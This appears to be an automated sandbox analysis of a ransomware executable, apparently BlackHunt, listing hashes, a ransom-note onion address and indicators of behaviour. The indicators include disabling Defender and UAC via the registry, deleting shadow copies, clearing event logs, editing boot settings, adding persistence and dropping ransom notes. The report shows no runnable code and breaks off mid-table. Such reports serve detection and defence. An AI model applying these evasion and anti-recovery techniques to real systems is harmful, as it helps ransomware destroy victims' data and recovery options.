Analysis
-
max time kernel
130s -
max time network
161s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
19/01/2024, 01:27
Static task
static1
Behavioral task
behavioral1
Sample
f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe
Resource
win10v2004-20231222-en
General
-
Target
f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe
-
Size
707KB
-
MD5
f5e42acb319fd802b9dfe75410a429e3
-
SHA1
33c312d0cd553baf8e8b2355f451bb5e10e46e2b
-
SHA256
f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804
-
SHA512
8d926485372b80fad3d7f49052a03b9fc82766fb56c5fc8eb332ad8b28eb4582a1d506a5d942b2dcd05f6b352d0d01487c05a1d1eff46c69377304d8a4ab1f32
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1d8zvnh:6uaTmkZJ+naie5OTamgEoKxLWYzh
Malware Config
Extracted
C:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 11544 fsutil.exe 15808 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 6432 wevtutil.exe 1512 wevtutil.exe 1148 wevtutil.exe 6140 wevtutil.exe 848 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 5220 bcdedit.exe 10460 bcdedit.exe 9184 bcdedit.exe 15624 bcdedit.exe -
Renames multiple (3377) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 6644 wbadmin.exe 17684 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\K: f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened (read-only) \??\U: f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened (read-only) \??\O: f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened (read-only) \??\Y: f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened (read-only) \??\J: f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened (read-only) \??\M: f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened (read-only) \??\Q: f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened (read-only) \??\T: f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\H: f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened (read-only) \??\B: f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened (read-only) \??\G: f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened (read-only) \??\L: f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\W: f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened (read-only) \??\I: f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened (read-only) \??\Z: f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened (read-only) \??\X: f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\R: f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened (read-only) \??\P: f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened (read-only) \??\S: f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened (read-only) \??\N: f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened (read-only) \??\V: f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened (read-only) \??\A: f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 10 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\pt-br\#BlackHunt_ReadMe.hta f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\es-es\#BlackHunt_Private.key f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\it-it\#BlackHunt_ReadMe.txt f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\hr-hr\#BlackHunt_Private.key f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\zh-cn\#BlackHunt_ReadMe.txt f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ar-ae\#BlackHunt_ReadMe.hta f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sl-si\ui-strings.js f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\tr-tr\ui-strings.js f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\hr-hr\#BlackHunt_Private.key f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_listview_selected.svg f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ru-ru\#BlackHunt_ReadMe.txt f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\he-il\#BlackHunt_ReadMe.txt f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app-api\dev\app-api.js f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\es-es\#BlackHunt_ReadMe.hta f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-tw\#BlackHunt_ReadMe.hta f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_splitter\#BlackHunt_Private.key f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-down.svg f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hu-hu\#BlackHunt_ReadMe.hta f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nb-no\#BlackHunt_ReadMe.txt f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\css\main.css f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\pt-br\#BlackHunt_ReadMe.txt f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_pl_135x40.svg f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\de-de\ui-strings.js f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\README.txt f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\cryptocme.sig f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\plugins.js f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-ma\#BlackHunt_ReadMe.hta f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-il\#BlackHunt_ReadMe.txt f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\#BlackHunt_Private.key f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ui-strings.js f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\cs-cz\#BlackHunt_ReadMe.txt f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_download_18.svg f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\de-de\#BlackHunt_ReadMe.hta f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\#BlackHunt_ReadMe.txt f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\tr-tr\#BlackHunt_Private.key f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\#BlackHunt_ReadMe.txt f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hr-hr\ui-strings.js f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hu-hu\ui-strings.js f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\de-de\#BlackHunt_ReadMe.hta f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sl-si\#BlackHunt_Private.key f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\it-it\#BlackHunt_ReadMe.hta f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#BlackHunt_ReadMe.txt f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\#BlackHunt_Private.key f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_share_18.svg f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\FillSign.aapp f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_up_selected_18.svg f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\#BlackHunt_Private.key f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ui-strings.js f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fi-fi\#BlackHunt_ReadMe.hta f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-fr\ui-strings.js f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hr-hr\#BlackHunt_ReadMe.hta f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#BlackHunt_ReadMe.txt f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\#BlackHunt_Private.key f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\ccloud_retina.png f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files\VideoLAN\VLC\locale\#BlackHunt_Private.key f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\#BlackHunt_ReadMe.hta f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sl-sl\#BlackHunt_Private.key f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\bg_pattern_RHP.png f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\es-es\ui-strings.js f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-ae\#BlackHunt_Private.key f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_zh_HK.properties f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-tw\#BlackHunt_ReadMe.txt f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pt-br\ui-strings.js f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\#BlackHunt_ReadMe.hta f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 18304 18136 WerFault.exe 296 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6048 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2224 vssadmin.exe 8400 vssadmin.exe 7576 vssadmin.exe 5228 vssadmin.exe 6132 vssadmin.exe 7940 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 17732 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 17868 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe Token: SeRestorePrivilege 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe Token: SeBackupPrivilege 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe Token: SeTakeOwnershipPrivilege 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe Token: SeAuditPrivilege 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe Token: SeSecurityPrivilege 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe Token: SeIncBasePriorityPrivilege 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe Token: SeBackupPrivilege 6236 vssvc.exe Token: SeRestorePrivilege 6236 vssvc.exe Token: SeAuditPrivilege 6236 vssvc.exe Token: SeBackupPrivilege 8888 wbengine.exe Token: SeRestorePrivilege 8888 wbengine.exe Token: SeSecurityPrivilege 8888 wbengine.exe Token: SeSecurityPrivilege 1148 wevtutil.exe Token: SeBackupPrivilege 1148 wevtutil.exe Token: SeSecurityPrivilege 6140 wevtutil.exe Token: SeBackupPrivilege 6140 wevtutil.exe Token: SeSecurityPrivilege 848 wevtutil.exe Token: SeBackupPrivilege 848 wevtutil.exe Token: SeSecurityPrivilege 6432 wevtutil.exe Token: SeBackupPrivilege 6432 wevtutil.exe Token: SeSecurityPrivilege 1512 wevtutil.exe Token: SeBackupPrivilege 1512 wevtutil.exe Token: SeDebugPrivilege 17732 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1856 wrote to memory of 1244 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 91 PID 1856 wrote to memory of 1244 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 91 PID 1856 wrote to memory of 4576 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 93 PID 1856 wrote to memory of 4576 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 93 PID 1856 wrote to memory of 4600 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 96 PID 1856 wrote to memory of 4600 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 96 PID 1856 wrote to memory of 444 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 100 PID 1856 wrote to memory of 444 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 100 PID 1856 wrote to memory of 3948 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 97 PID 1856 wrote to memory of 3948 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 97 PID 1856 wrote to memory of 1128 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 102 PID 1856 wrote to memory of 1128 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 102 PID 1856 wrote to memory of 660 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 103 PID 1856 wrote to memory of 660 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 103 PID 1856 wrote to memory of 1360 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 106 PID 1856 wrote to memory of 1360 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 106 PID 1856 wrote to memory of 180 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 107 PID 1856 wrote to memory of 180 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 107 PID 1856 wrote to memory of 4716 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 109 PID 1856 wrote to memory of 4716 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 109 PID 1856 wrote to memory of 2748 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 112 PID 1856 wrote to memory of 2748 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 112 PID 1856 wrote to memory of 5016 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 114 PID 1856 wrote to memory of 5016 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 114 PID 1856 wrote to memory of 1976 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 118 PID 1856 wrote to memory of 1976 1856 f6b922d337cf9b620ad33df6cda4208e91fca62ae112b51415e7bd7dfce15804.exe 118 PID 4600 wrote to memory of 1740 4600 cmd.exe 